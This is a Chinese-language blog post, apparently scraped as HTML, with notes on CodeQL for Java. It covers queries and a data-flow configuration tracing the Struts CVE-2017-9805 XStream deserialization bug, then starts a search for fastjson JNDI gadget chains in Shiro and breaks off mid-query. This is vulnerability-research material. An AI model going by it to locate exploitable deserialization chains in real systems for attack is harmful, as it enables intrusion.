<!DOCTYPE html>





<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.4.0">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.4.0">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.4.0">
  <link rel="mask-icon" href="/images/logo.svg?v=7.4.0" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.4.0">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.4.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":"enable","show_result":false,"style":"mac"},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: 'Copy',
      copy_success: 'Copied',
      copy_failure: 'Copy failed'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="本文主要内容有：  如何查找函数调用 如何查找属性使用 如何进行数据流分析 寻找fastjson jndi反序列化链  Workshop 学习这部分是学习这个codeql的workshop的笔记。Struts 有个漏洞 CVE-2017-9805 ，是由于用户控制的输入直接传到了XStream.fromXML，造成了反序列化漏洞。这个workshop主要是分析如何利用codeql数据流分析功能找到">
<meta name="keywords" content="codeql,java,code-static-analysis">
<meta property="og:type" content="article">
<meta property="og:title" content="Learn CodeQL for Java by workshop">
<meta property="og:url" content="https://blog.sometimenaive.com/2020/05/19/codeql-structs-xml-deserialization/index.html">
<meta property="og:site_name" content="yxxx&#39;s blog">
<meta property="og:description" content="本文主要内容有：  如何查找函数调用 如何查找属性使用 如何进行数据流分析 寻找fastjson jndi反序列化链  Workshop 学习这部分是学习这个codeql的workshop的笔记。Struts 有个漏洞 CVE-2017-9805 ，是由于用户控制的输入直接传到了XStream.fromXML，造成了反序列化漏洞。这个workshop主要是分析如何利用codeql数据流分析功能找到">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515193433756.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515193757389.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515193926328.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515194140623.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515201439529.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515205830831.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515203523458.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515203631251.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515211136890.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515213246484.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515213315638.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200516120037602.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200516123405926.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200516145514480.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200516153812978.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200516154142273.png">
<meta property="og:updated_time" content="2020-05-18T16:06:53.724Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Learn CodeQL for Java by workshop">
<meta name="twitter:description" content="本文主要内容有：  如何查找函数调用 如何查找属性使用 如何进行数据流分析 寻找fastjson jndi反序列化链  Workshop 学习这部分是学习这个codeql的workshop的笔记。Struts 有个漏洞 CVE-2017-9805 ，是由于用户控制的输入直接传到了XStream.fromXML，造成了反序列化漏洞。这个workshop主要是分析如何利用codeql数据流分析功能找到">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515193433756.png">
  <link rel="canonical" href="https://blog.sometimenaive.com/2020/05/19/codeql-structs-xml-deserialization/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>Learn CodeQL for Java by workshop | yxxx's blog</title>
  








  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
  <div class="container use-motion">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">yxxx's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
      
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-about">
      
    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-tags">
      
    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-categories">
      
    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>Categories</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
            

          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
      <article itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block post">
    <link itemprop="mainEntityOfPage" href="https://blog.sometimenaive.com/2020/05/19/codeql-structs-xml-deserialization/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="yxxx">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="yxxx's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">Learn CodeQL for Java by workshop

          
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              
                
              

              <time title="Created: 2020-05-19 00:06:53" itemprop="dateCreated datePublished" datetime="2020-05-19T00:06:53+08:00">2020-05-19</time>
            </span>
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">In</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/websec/" itemprop="url" rel="index"><span itemprop="name">websec</span></a></span>

                
                
              
            </span>
          

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>本文主要内容有：</p>
<ul>
<li>如何查找函数调用</li>
<li>如何查找属性使用</li>
<li>如何进行数据流分析</li>
<li>寻找fastjson jndi反序列化链</li>
</ul>
<h2 id="Workshop-学习"><a href="#Workshop-学习" class="headerlink" title="Workshop 学习"></a>Workshop 学习</h2><p>这部分是学习这个codeql的<a href="https://github.com/githubsatelliteworkshops/codeql/blob/master/java.md" target="_blank" rel="noopener">workshop</a>的笔记。Struts 有个漏洞 <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805" target="_blank" rel="noopener">CVE-2017-9805</a> ，是由于用户控制的输入直接传到了<code>XStream.fromXML</code>，造成了反序列化漏洞。这个workshop主要是分析如何利用codeql数据流分析功能找到这个洞。</p>
<p><code>Struts</code>有个 <code>contentypehandler</code> 的<code>interface</code> 里面有个方法是<code>toObject(Reader in, Object target)</code>, 这个方法是用来根据用户请求的<code>content-type</code>来进行处理请求。现在已知这个<code>in</code> 是由用户完全控制的，可以算是一个<code>source</code>，另外一个已知是<code>com.thoughtworks.xstream.fromXML</code> 存在反序列化问题，可以算是一个<code>sink</code>.</p>
<p>所以进行数据流分析可以是从<code>toObject</code>这个<code>Method</code>的<code>in</code> 这个<code>Parameter</code>，流到<code>fromXML</code>这个<code>MethodAccess</code>的<code>arguement</code></p>
<p>下面是<code>parameter</code> 和 <code>argument</code>的区别。简单的来说<code>parameter</code>是函数定义时候的变量，<code>argument</code>是调用时传进去的变量。</p>
<blockquote>
<p>A parameter is a variable in a method definition. When a method is called, the arguments are the data you pass into the method’s parameters.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&gt; public void MyMethod(string myParam) &#123; &#125;</span><br><span class="line">&gt; </span><br><span class="line">&gt; ...</span><br><span class="line">&gt; </span><br><span class="line">&gt; string myArg1 = &quot;this is my argument&quot;;</span><br><span class="line">&gt; myClass.MyMethod(myArg1);</span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<h3 id="Method"><a href="#Method" class="headerlink" title="Method"></a>Method</h3><h4 id="根据Method-name查询"><a href="#根据Method-name查询" class="headerlink" title="根据Method name查询"></a>根据Method name查询</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import java</span><br><span class="line"></span><br><span class="line">from Method method</span><br><span class="line">where method.hasName("toObject")</span><br><span class="line"><span class="keyword">select</span> method</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515193433756.png" alt="image-20200515193433756"></p>
<p>把这个方法的<code>class</code> <code>name</code>也查出来</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import java</span><br><span class="line"></span><br><span class="line">from Method method</span><br><span class="line">where method.hasName("toObject")</span><br><span class="line"><span class="keyword">select</span> method, method.getDeclaringType()</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515193757389.png" alt="image-20200515193757389"></p>
<p>点击右侧的可以看到相应的代码片段。</p>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515193926328.png" alt="image-20200515193926328"></p>
<p>这里比较奇怪，为啥8，9会出现。</p>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515194140623.png" alt="image-20200515194140623"></p>
<p>查看代码可以发现这是一个匿名类。看到这里感觉codeql还是比较牛逼的。</p>
<h4 id="根据Method-name-和-class-name-查询"><a href="#根据Method-name-和-class-name-查询" class="headerlink" title="根据Method name 和 class name 查询"></a>根据Method name 和 class name 查询</h4><p>比如我想查询<code>Xstream</code> 这个类的<code>fromXML</code> 方法。</p>
<blockquote>
<p>predicate <a href="https://help.semmle.com/qldoc/java/semmle/code/java/Type.qll/predicate.Type$RefType$hasQualifiedName.2.html" target="_blank" rel="noopener">hasQualifiedName</a>(<a href="https://help.semmle.com/qldoc/java/type.string.html" target="_blank" rel="noopener">string</a> package, <a href="https://help.semmle.com/qldoc/java/type.string.html" target="_blank" rel="noopener">string</a> type)</p>
</blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import java</span><br><span class="line"></span><br><span class="line">from Method method</span><br><span class="line">where method.hasName("fromXML") and method.getDeclaringType().hasQualifiedName("com.thoughtworks.xstream", "XStream")</span><br><span class="line"><span class="keyword">select</span> method</span><br></pre></td></tr></table></figure>
<h4 id="根据Method-name-和-interface-name-查询"><a href="#根据Method-name-和-interface-name-查询" class="headerlink" title="根据Method name 和 interface name 查询"></a>根据Method name 和 interface name 查询</h4><p>比如我想查询<code>ContentTypeHandler</code> 的所有子类<code>toObject</code>方法</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import java</span><br><span class="line"></span><br><span class="line">from Method method</span><br><span class="line">where method.hasName("toObject") and method.getDeclaringType().getASupertype().hasQualifiedName("org.apache.struts2.rest.handler", "ContentTypeHandler")</span><br><span class="line"><span class="keyword">select</span> method</span><br></pre></td></tr></table></figure>
<p>这样会比直接根据method name查少一个结果,少的结果是<code>ContentTypeHanlder</code>他自己。</p>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515201439529.png" alt="image-20200515201439529"></p>
<p>可以用<code>getAnAncestor()</code></p>
<blockquote>
<p>Gets a direct or indirect supertype of this type, including itself.</p>
<p><a href="https://help.semmle.com/qldoc/java/semmle/code/java/Type.qll/type.Type$RefType.html" target="_blank" rel="noopener">RefType</a> <a href="https://help.semmle.com/qldoc/java/semmle/code/java/Type.qll/predicate.Type$RefType$getAnAncestor.0.html" target="_blank" rel="noopener">getAnAncestor</a>()</p>
</blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import java</span><br><span class="line"></span><br><span class="line">from Method method</span><br><span class="line">where method.hasName("toObject") and method.getDeclaringType().getAnAncestor().hasQualifiedName("org.apache.struts2.rest.handler", "ContentTypeHandler")</span><br><span class="line"><span class="keyword">select</span> method</span><br></pre></td></tr></table></figure>
<p>也可以用<code>getDeclaringType()*</code>  类似的还有<code>getDeclaringType()+</code></p>
<p>有个问题是，万一一个类实现了多个接口是不是也可以这么用？ 答案是是的</p>
<p><code>getAxxxx</code>，如果有多个结果会以多行的形式按照一定的顺序显示出来。</p>
<p>比如<code>getAParamType</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515205830831.png" alt="image-20200515205830831"></p>
<h4 id="获取Method的parameter"><a href="#获取Method的parameter" class="headerlink" title="获取Method的parameter"></a>获取Method的parameter</h4><blockquote>
<p><a href="https://help.semmle.com/qldoc/java/semmle/code/java/Member.qll/predicate.Member$Callable$getAParamType.0.html" target="_blank" rel="noopener">getAParamType()</a> Gets the type of a formal parameter of this callable</p>
<p><a href="https://help.semmle.com/qldoc/java/semmle/code/java/Member.qll/predicate.Member$Callable$getAParameter.0.html" target="_blank" rel="noopener">getAParameter()</a> Gets a formal parameter of this callable</p>
<p><a href="https://help.semmle.com/qldoc/java/semmle/code/java/Member.qll/predicate.Member$Callable$getNumberOfParameters.0.html" target="_blank" rel="noopener">getNumberOfParameters()</a> Gets the number of formal parameters of this callable.</p>
<p><a href="https://help.semmle.com/qldoc/java/semmle/code/java/Member.qll/predicate.Member$Callable$getParameter.1.html" target="_blank" rel="noopener">getParameter(int n)</a>  Gets the formal parameter at the specified (zero-based) position.</p>
<p><a href="https://help.semmle.com/qldoc/java/semmle/code/java/Member.qll/predicate.Member$Callable$getParameterType.1.html" target="_blank" rel="noopener">getParameterType(int n)</a>  Gets the type of the formal parameter at the specified (zero-based) position</p>
</blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import java</span><br><span class="line"></span><br><span class="line">from MethodAccess <span class="keyword">call</span>, Method method</span><br><span class="line"><span class="keyword">where</span> method.hasName(<span class="string">"toObject"</span>) <span class="keyword">and</span> method.getDeclaringType().getAnAncestor().hasQualifiedName(<span class="string">"org.apache.struts2.rest.handler"</span>, <span class="string">"ContentTypeHandler"</span>) <span class="keyword">and</span> call.getMethod() = method</span><br><span class="line"><span class="keyword">select</span> method.getParameter(<span class="number">0</span>)</span><br></pre></td></tr></table></figure>
<h3 id="MethodAccess"><a href="#MethodAccess" class="headerlink" title="MethodAccess"></a>MethodAccess</h3><p>一般是先查<code>method</code>，与<code>MethodAccess.getMethod()</code>  进行比较。</p>
<p>比如查<code>ContentTypeHandler</code> 的 <code>toObject()</code> 方法的调用。 </p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import java</span><br><span class="line"></span><br><span class="line">from MethodAccess <span class="keyword">call</span>, Method method</span><br><span class="line"><span class="keyword">where</span> method.hasName(<span class="string">"toObject"</span>) <span class="keyword">and</span> method.getDeclaringType().getASupertype().hasQualifiedName(<span class="string">"org.apache.struts2.rest.handler"</span>, <span class="string">"ContentTypeHandler"</span>) <span class="keyword">and</span> call.getMethod() = method</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">call</span></span><br></pre></td></tr></table></figure>
<p>上面这种查询方式不行，只能查到<code>JsonLibHandler</code> 这样显式定义的。</p>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515203523458.png" alt="image-20200515203523458"></p>
<p>对于这种, 真正用的并没有查到</p>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515203631251.png" alt="image-20200515203631251"></p>
<p>怎么改进呢？<br>也可以使用<code>getAnAncestor()</code> 或者<code>getASupertype()*</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import java</span><br><span class="line"></span><br><span class="line">from MethodAccess <span class="keyword">call</span>, Method method</span><br><span class="line"><span class="keyword">where</span> method.hasName(<span class="string">"toObject"</span>) <span class="keyword">and</span> method.getDeclaringType().getAnAncestor().hasQualifiedName(<span class="string">"org.apache.struts2.rest.handler"</span>, <span class="string">"ContentTypeHandler"</span>) <span class="keyword">and</span> call.getMethod() = method</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">call</span></span><br></pre></td></tr></table></figure>
<p>这种查询能够涵盖上面的两种情况</p>
<p>从上面可以看到<code>MethodAccess</code> 的查询依赖于<code>Method</code> 的查询。</p>
<h4 id="获取MethodAccess-的-argument"><a href="#获取MethodAccess-的-argument" class="headerlink" title="获取MethodAccess 的 argument"></a>获取MethodAccess 的 argument</h4><blockquote>
<p> <a href="https://help.semmle.com/qldoc/java/semmle/code/java/Expr.qll/predicate.Expr$MethodAccess$getATypeArgument.0.html" target="_blank" rel="noopener">getATypeArgument</a> Gets a type argument supplied as part of this method access, if any.<br> <a href="https://help.semmle.com/qldoc/java/semmle/code/java/Expr.qll/predicate.Expr$MethodAccess$getAnArgument.0.html" target="_blank" rel="noopener">getAnArgument</a>  Gets an argument supplied to the method that is invoked using this method access.<br> <a href="https://help.semmle.com/qldoc/java/semmle/code/java/Expr.qll/predicate.Expr$MethodAccess$getArgument.1.html" target="_blank" rel="noopener">getArgument(int n)</a>  Gets the argument at the specified (zero-based) position in this method access. </p>
<p> <a href="https://help.semmle.com/qldoc/java/semmle/code/java/Expr.qll/predicate.Expr$MethodAccess$getTypeArgument.1.html" target="_blank" rel="noopener">getTypeArgument(int n)</a>  Gets the type argument at the specified (zero-based) position in this method access, if any. </p>
</blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import java</span><br><span class="line"></span><br><span class="line">from MethodAccess <span class="keyword">call</span>, Method method</span><br><span class="line"><span class="keyword">where</span> method.hasName(<span class="string">"toObject"</span>) <span class="keyword">and</span> method.getDeclaringType().getAnAncestor().hasQualifiedName(<span class="string">"org.apache.struts2.rest.handler"</span>, <span class="string">"ContentTypeHandler"</span>) <span class="keyword">and</span> call.getMethod() = method</span><br><span class="line"><span class="keyword">select</span> call.getArgument(<span class="number">0</span>)</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515211136890.png" alt="image-20200515211136890"></p>
<h3 id="dataflow"><a href="#dataflow" class="headerlink" title="dataflow"></a>dataflow</h3><p>从source，到sink 有没有一条路径。</p>
<p>也就是从toObject的in parameter 到 fromXML的in argument 有没有一条路径。</p>
<p>数据流分析要继承<code>DataFlow::Configuration</code> 这个类，然后重载<code>isSource</code> 和<code>isSink</code> 方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">class MyConfig extends DataFlow::Configuration &#123;</span><br><span class="line">  MyConfig() &#123; this = &quot;Myconfig&quot; &#125;</span><br><span class="line">  override predicate isSource(DataFlow::Node source) &#123;</span><br><span class="line">    ....</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">    override predicate isSink(DataFlow::Node sink) &#123;</span><br><span class="line">    ....</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>先介绍一下<code>exists</code> 的用法。</p>
<blockquote>
<h4 id="exists"><a href="#exists" class="headerlink" title="exists"></a><code>exists</code></h4><p>This quantifier has the following syntax:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; exists(&lt;variable declarations&gt; | &lt;formula&gt;)</span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<p>&gt;</p>
<blockquote>
<p>You can also write <code>exists( | | )</code>. This is equivalent to <code>exists( | and )</code>.</p>
<p>This quantified formula introduces some new variables. It holds if there is at least one set of values that the variables could take to make the formula in the body true.</p>
<p>For example, <code>exists(int i | i instanceof OneTwoThree)</code> introduces a temporary variable of type <code>int</code> and holds if any value of that variable has type <code>OneTwoThree</code>.</p>
</blockquote>
<p>说人话就是，<code>variable</code>满足<code>formula</code> 则返回true 否则返回false</p>
<p>Node 的 方法</p>
<blockquote>
<p> <a href="https://help.semmle.com/qldoc/java/semmle/code/java/dataflow/internal/DataFlowUtil.qll/predicate.DataFlowUtil$Node$asExpr.0.html" target="_blank" rel="noopener">asExpr</a> Gets the expression corresponding to this node, if any.<br><a href="https://help.semmle.com/qldoc/java/semmle/code/java/dataflow/internal/DataFlowUtil.qll/predicate.DataFlowUtil$Node$asParameter.0.html" target="_blank" rel="noopener">asParameter</a>  Gets the parameter corresponding to this node, if any. </p>
</blockquote>
<p>完整的数据流分析代码如下</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">import java</span><br><span class="line">import semmle.code.java.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line">class StrutsUnsafeDeserializationConfig extends DataFlow::Configuration &#123;</span><br><span class="line">  StrutsUnsafeDeserializationConfig() &#123; this = "StrutsUnsafeDeserializationConfig" &#125;</span><br><span class="line">  override predicate isSource(DataFlow::Node source) &#123;</span><br><span class="line">    exists(Method method |</span><br><span class="line">    method.hasName("toObject") and method.getDeclaringType().getAnAncestor().hasQualifiedName("org.apache.struts2.rest.handler", "ContentTypeHandler") and source.asParameter() = method.getParameter(0)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">    override predicate isSink(DataFlow::Node sink) &#123;</span><br><span class="line">    exists(MethodAccess <span class="keyword">call</span>, Method method |</span><br><span class="line">      method.hasName(<span class="string">"fromXML"</span>) <span class="keyword">and</span> method.getDeclaringType().hasQualifiedName(<span class="string">"com.thoughtworks.xstream"</span>, <span class="string">"XStream"</span>) <span class="keyword">and</span> call.getMethod() = method <span class="keyword">and</span> sink.asExpr() = call.getArgument(<span class="number">0</span>)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> StrutsUnsafeDeserializationConfig config, DataFlow::Node <span class="keyword">source</span>, DataFlow::Node sink</span><br><span class="line"><span class="keyword">where</span> config.hasFlow(<span class="keyword">source</span>, sink)</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">source</span>, sink</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515213246484.png" alt="image-20200515213246484"></p>
<p><img src="https://cdn.jsdelivr.net/gh/waderwu/blog-img/2020/5/image-20200515213315638.png" alt="image-20200515213315638"></p>
<h2 id="小试牛刀-codeql-找fastjson-反序列化链"><a href="#小试牛刀-codeql-找fastjson-反序列化链" class="headerlink" title="小试牛刀 - codeql 找fastjson 反序列化链"></a>小试牛刀 - codeql 找fastjson 反序列化链</h2><p>为了与这位老哥<a href="https://xz.aliyun.com/t/7482作个对比，这里我也选用了`shrio`" target="_blank" rel="noopener">https://xz.aliyun.com/t/7482作个对比，这里我也选用了`shrio`</a> 和<code>common-configuration</code></p>
<h3 id="shrio"><a href="#shrio" class="headerlink" title="shrio"></a>shrio</h3><p><code>source</code> 主要是 <code>class</code>的所有<code>Field</code>, <code>sink</code> 就是<code>javax.naming</code> <code>Context</code> <code>interface</code> 的 <code>lookup</code> 方法，看16年backhat 的那个ppt其实还有个<code>search</code>方法，但是这个不能直接注入URL，所以在这里就不考虑了。大家如果还有其他<code>sink</code>欢迎联系一起交流。</p>
<p>第一版代码</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">import java</span><br><span class="line">import semmle.code.java.dataflow.DataFlow</span><br><span class="line">import semmle.code.java.dataflow.TaintTracking</span><br><span class="line"></span><br><span class="line">class JNDIMethod extends Method&#123;</span><br><span class="line">    JNDIMethod()&#123;</span><br><span class="line">        this.getDeclaringType().getAnAncestor().hasQualifiedName("javax.naming", "Context") and</span><br><span class="line">        this.hasName("lookup")</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class 